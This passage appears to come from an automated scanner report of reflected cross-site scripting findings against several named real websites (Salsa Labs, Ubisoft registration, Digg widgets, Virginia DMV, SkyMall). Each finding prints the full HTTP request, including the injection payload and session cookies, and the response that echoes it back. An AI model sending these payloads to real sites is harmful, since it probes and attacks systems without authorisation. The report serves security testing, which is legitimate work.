GET /o66456"-alert(1)-"9f81cfc7a30/8001/p/salsa/commons/img/favicon.ico HTTP/1.1
Host: salsacommons.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 16:04:43 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: SRV=vweb4; path=/
Content-Length: 13402

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
"text/javascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://salsacommons.org/o66456"-alert(1)-"9f81cfc7a30/8001/p/salsa/commons/img/favicon.ico?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({

...[SNIP]...

3.169. http://salsacommons.org/o/8001/p/salsa/commons/img/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://salsacommons.org
Path:   /o/8001/p/salsa/commons/img/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f7c4"-alert(1)-"e91fbaea79c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /o/8001/p3f7c4"-alert(1)-"e91fbaea79c/salsa/commons/img/favicon.ico HTTP/1.1
Host: salsacommons.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 16:04:48 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: SRV=vweb5; path=/
Content-Length: 13402

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
avascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://salsacommons.org/o/8001/p3f7c4"-alert(1)-"e91fbaea79c/salsa/commons/img/favicon.ico?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
mod
...[SNIP]...

3.170. http://salsacommons.org/o/8001/p/salsa/commons/img/favicon.ico [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://salsacommons.org
Path:   /o/8001/p/salsa/commons/img/favicon.ico

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64410"-alert(1)-"1c986b6dd8 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /o/8001/p/salsa/commons/img/favicon.ico64410"-alert(1)-"1c986b6dd8 HTTP/1.1
Host: salsacommons.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 16:05:02 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: SRV=vweb1; path=/
Content-Length: 13400

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...

function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://salsacommons.org/o/8001/p/salsa/commons/img/favicon.ico64410"-alert(1)-"1c986b6dd8?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
modal: true,
widt
...[SNIP]...

3.171. https://secure.ubi.com/register/CreateAccount.aspx [NextURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.ubi.com
Path:   /register/CreateAccount.aspx

Issue detail

The value of the NextURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd14d"style%3d"x%3aexpression(alert(1))"74425cf103d was submitted in the NextURL parameter. This input was echoed as fd14d"style="x:expression(alert(1))"74425cf103d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /register/CreateAccount.aspx?genomeId=c970157e-c24d-44f3-aba7-819b852e0e02&NextURL=999895'()973289fd14d"style%3d"x%3aexpression(alert(1))"74425cf103d&lang=en-US HTTP/1.1
Host: secure.ubi.com
Connection: keep-alive
Referer: https://secure.ubi.com/register/login.aspx?genomeId=C970157E-C24D-44F3-ABA7-819B852E0E02&lang=en-US&NextUrl=999895%27%28%29973289
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=101287877.1303486155.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visitor_id=A8CC6CF1-F210-440C-B57B-E6567568B947; utsver=30053; ubisession=1976650102; __utma=101287877.1723011522.1303486155.1303486155.1303486155.1; __utmc=101287877; __utmb=101287877.2.10.1303486155; ASP.NET_SessionId=hyemfw450y0nxlb4z35rg2eu

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 130586
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 22 Apr 2011 16:05:48 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>



...[SNIP]...
<a href="javascript:AbandonAccountCreation('999895'()973289fd14d"style="x:expression(alert(1))"74425cf103d?cancel=true');" style="position:relative; z-index:999; display:block; width:30px; height:25px; border:0px; text-decoration:none; float:right;">
...[SNIP]...

3.172. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 168d7<script>alert(1)</script>c3e46dbbdc1 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/22/html/dork/xss-reflected-cwe79-secure.ubi.com_443.htm168d7<script>alert(1)</script>c3e46dbbdc1 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Fri, 22 Apr 2011 17:12:39 GMT
Via: NS-CACHE: 100
Etag: "f72477ac64c705668216310b102e3cb7503ff057"
Content-Length: 163
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Fri, 22 Apr 2011 17:22:38 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/cdn/2011/04/22/html/dork/xss-reflected-cwe79-secure.ubi.com_443.htm168d7<script>alert(1)</script>c3e46dbbdc1", "diggs": 0});

3.173. http://www.dmvnow.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dmvnow.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ef4"><script>alert(1)</script>42d3138b490 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico82ef4"><script>alert(1)</script>42d3138b490 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dmvnow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Set-Cookie: BIGipServerhttp_pool=2525040812.20480.0000; expires=Sat, 23-Apr-2011 15:18:04 GMT; path=/
Server: Microsoft-IIS/5.0
Date: Fri, 22 Apr 2011 15:18:04 GMT
X-Powered-By: ASP.NET
Content-Length: 17571
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<HTML>
   <HEAD>
           <title>Commonwealth of Virginia Department of
...[SNIP]...
<a class="main" href="/webdoc/utilities/error.asp?

404;http://www.dmvnow.com/favicon.ico82ef4"><script>alert(1)</script>42d3138b490&amp;


pf=y">
...[SNIP]...

3.174. http://www.salsalabs.com/o/8001/p/salsa/website/labs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salsalabs.com
Path:   /o/8001/p/salsa/website/labs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2bc1"-alert(1)-"492761e65ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /od2bc1"-alert(1)-"492761e65ec/8001/p/salsa/website/labs/ HTTP/1.1
Host: www.salsalabs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:26:59 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13384

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
text/javascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://www.salsalabs.com/od2bc1"-alert(1)-"492761e65ec/8001/p/salsa/website/labs/?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
modal:
...[SNIP]...

3.175. http://www.salsalabs.com/o/8001/p/salsa/website/labs/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salsalabs.com
Path:   /o/8001/p/salsa/website/labs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17b9f"-alert(1)-"154cd4038ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /o/8001/p17b9f"-alert(1)-"154cd4038ad/salsa/website/labs/ HTTP/1.1
Host: www.salsalabs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:11 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13384

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
vascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://www.salsalabs.com/o/8001/p17b9f"-alert(1)-"154cd4038ad/salsa/website/labs/?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
modal: true,

...[SNIP]...

3.176. http://www.salsalabs.com/o/8001/p/salsa/website/labs/img/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salsalabs.com
Path:   /o/8001/p/salsa/website/labs/img/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e80a5"-alert(1)-"a7f7679dbe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /oe80a5"-alert(1)-"a7f7679dbe8/8001/p/salsa/website/labs/img/favicon.ico HTTP/1.1
Host: www.salsalabs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:31:14 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13414

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
text/javascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://www.salsalabs.com/oe80a5"-alert(1)-"a7f7679dbe8/8001/p/salsa/website/labs/img/favicon.ico?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({

...[SNIP]...

3.177. http://www.salsalabs.com/o/8001/p/salsa/website/labs/img/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salsalabs.com
Path:   /o/8001/p/salsa/website/labs/img/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2795"-alert(1)-"3186fbadb7e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /o/8001/pb2795"-alert(1)-"3186fbadb7e/salsa/website/labs/img/favicon.ico HTTP/1.1
Host: www.salsalabs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:31:55 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13414

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
vascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://www.salsalabs.com/o/8001/pb2795"-alert(1)-"3186fbadb7e/salsa/website/labs/img/favicon.ico?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({

...[SNIP]...

3.178. http://www.salsalabs.com/o/8001/p/salsa/website/labs/img/favicon.ico [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salsalabs.com
Path:   /o/8001/p/salsa/website/labs/img/favicon.ico

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5413"-alert(1)-"2568c09e6eb was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /o/8001/p/salsa/website/labs/img/favicon.icoc5413"-alert(1)-"2568c09e6eb HTTP/1.1
Host: www.salsalabs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:32:09 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13414

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://www.salsalabs.com/o/8001/p/salsa/website/labs/img/favicon.icoc5413"-alert(1)-"2568c09e6eb?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
modal: true,
widt
...[SNIP]...

3.179. https://www.salsalabs.com/dia/hq/css/custom.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salsalabs.com
Path:   /dia/hq/css/custom.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95f48"-alert(1)-"9e6d2606619 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /95f48"-alert(1)-"9e6d2606619/hq/css/custom.css HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Referer: https://www.salsalabs.com/dia/hq/sso/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:09 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13439

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
text/javascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "https://www.salsalabs.com/95f48"-alert(1)-"9e6d2606619/hq/css/custom.css?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
modal: true,

...[SNIP]...

3.180. https://www.salsalabs.com/dia/hq/sso/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salsalabs.com
Path:   /dia/hq/sso/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7ecf"-alert(1)-"bf4e2d5f0b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f7ecf"-alert(1)-"bf4e2d5f0b7/hq/sso/ HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Referer: http://www.salsalabs.com/o/8001/p/salsa/website/labs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:07 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13451

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
text/javascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "https://www.salsalabs.com/f7ecf"-alert(1)-"bf4e2d5f0b7/hq/sso/?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
modal: true,

...[SNIP]...

3.181. https://www.salsalabs.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salsalabs.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89371"-alert(1)-"db10ed2c3c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico89371"-alert(1)-"db10ed2c3c4 HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:11 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13352

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
ript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "https://www.salsalabs.com/favicon.ico89371"-alert(1)-"db10ed2c3c4?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
modal: true,
widt
...[SNIP]...

3.182. http://www.skymall.com/shopping/dept.htm [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed2be"%3balert(1)//3e04ad354f9 was submitted in the c parameter. This input was echoed as ed2be";alert(1)//3e04ad354f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/dept.htm?c=10500ed2be"%3balert(1)//3e04ad354f9 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
